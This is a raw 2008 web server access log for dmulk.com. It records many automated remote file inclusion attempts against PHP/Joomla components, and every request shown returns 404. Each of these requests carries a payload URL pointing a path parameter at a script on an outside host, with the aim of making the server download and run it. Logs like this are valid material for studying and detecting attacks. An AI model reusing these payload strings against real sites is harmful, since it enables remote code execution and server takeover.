68.142.135.142 - - [02/Mar/2008:05:10:38 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:10:38 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:10:38 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:10:38 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:11:11 -0800] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
64.185.237.143 - - [02/Mar/2008:05:11:11 -0800] "GET /logs/access_080119.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:11:11 -0800] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:11:19 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:05:11:39 -0800] "GET /logs/access_080124.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.151 - - [02/Mar/2008:05:11:49 -0800] "GET /logs/?D=A HTTP/1.0" 200 36958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.252.17.105 - - [02/Mar/2008:05:11:52 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [02/Mar/2008:05:11:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [02/Mar/2008:05:11:53 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [02/Mar/2008:05:12:16 -0800] "GET /logs/access_080117.log/tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:12:28 -0800] "GET /logs/access_080221.log//components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:12:28 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:12:29 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.219.199.216 - - [02/Mar/2008:05:12:58 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
85.219.199.216 - - [02/Mar/2008:05:12:58 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
72.55.168.243 - - [02/Mar/2008:05:13:01 -0800] "GET /index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.55.168.243 - - [02/Mar/2008:05:13:02 -0800] "GET /logs/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:05:13:10 -0800] "GET /logs/access_080211.log/index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:05:13:11 -0800] "GET /index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:05:13:11 -0800] "GET /logs/index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:05:14:58 -0800] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:05:14:59 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:05:14:59 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.80.167 - - [02/Mar/2008:05:14:59 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.80.167 - - [02/Mar/2008:05:15:00 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.80.167 - - [02/Mar/2008:05:15:00 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:05:15:21 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:05:15:21 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:15:26 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:05:15:26 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:15:26 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:15:27 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:05:15:28 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:05:15:30 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:05:15:31 -0800] "GET /modules/My_eGallery/index.php?basepath=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.214.22.241 - - [02/Mar/2008:05:15:35 -0800] "GET /logs/access_080215.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.22.241 - - [02/Mar/2008:05:15:35 -0800] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.22.241 - - [02/Mar/2008:05:15:36 -0800] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:15:36 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
72.29.80.167 - - [02/Mar/2008:05:15:40 -0800] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:16:10 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
212.34.140.130 - - [02/Mar/2008:05:16:11 -0800] "GET /logs/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
212.34.140.130 - - [02/Mar/2008:05:16:12 -0800] "GET /index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:16:15 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:05:16:16 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:05:16:31 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.22.241 - - [02/Mar/2008:05:17:22 -0800] "GET /logs/access_080129.log//becommunity/community/index.php?pageurl=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.22.241 - - [02/Mar/2008:05:17:22 -0800] "GET /logs//becommunity/community/index.php?pageurl=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:05:17:43 -0800] "GET /logs/access_080119.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
202.47.247.136 - - [02/Mar/2008:05:18:50 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bekasihacker/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.143.142.163 - - [02/Mar/2008:05:18:50 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bekasihacker/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.143.142.163 - - [02/Mar/2008:05:18:51 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bekasihacker/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.22.241 - - [02/Mar/2008:05:19:24 -0800] "GET /logs/access_080207.log//becommunity/community/index.php?pageurl=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:05 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:06 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:06 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:06 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:07 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:07 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:07 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:07 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:07 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:07 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:08 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:08 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:16 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:16 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:16 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:17 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:17 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:17 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:19 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:19 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:19 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:19 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:26 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [02/Mar/2008:05:20:26 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:05:20:45 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:05:20:55 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:05:20:59 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.111.157 - - [02/Mar/2008:05:22:38 -0800] "GET /logs/access_080104.log//modules/Neos_Chronos/header.php?base_folder=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [02/Mar/2008:05:22:38 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [02/Mar/2008:05:22:39 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [02/Mar/2008:05:24:09 -0800] "GET /logs/access_080107.log//modules/Neos_Chronos/header.php?base_folder=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:05:24:16 -0800] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.252.17.105 - - [02/Mar/2008:05:24:38 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:24:51 -0800] "GET /logs/access_080216.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:24:51 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:05:24:52 -0800] "GET /logs/access_080216.log/components/com_galleria/galleria.html.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:24:52 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:05:24:52 -0800] "GET /components/com_galleria/galleria.html.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [02/Mar/2008:05:24:53 -0800] "GET /logs/components/com_galleria/galleria.html.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:25:09 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:05:25:11 -0800] "GET /logs/access_080208.log/index.php?body=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:05:25:11 -0800] "GET /logs/access_080208.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:05:25:11 -0800] "GET /index.php?body=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:05:25:12 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:05:25:12 -0800] "GET /logs/index.php?body=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:05:25:12 -0800] "GET /logs/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:25:19 -0800] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:25:23 -0800] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:25:25 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:25:36 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:25:37 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:25:37 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.148.36 - - [02/Mar/2008:05:25:40 -0800] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.107 - - [02/Mar/2008:05:26:10 -0800] "GET /logs/access.log HTTP/1.0" 200 124378 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:26:53 -0800] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:26:55 -0800] "GET /logs/access_080201.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
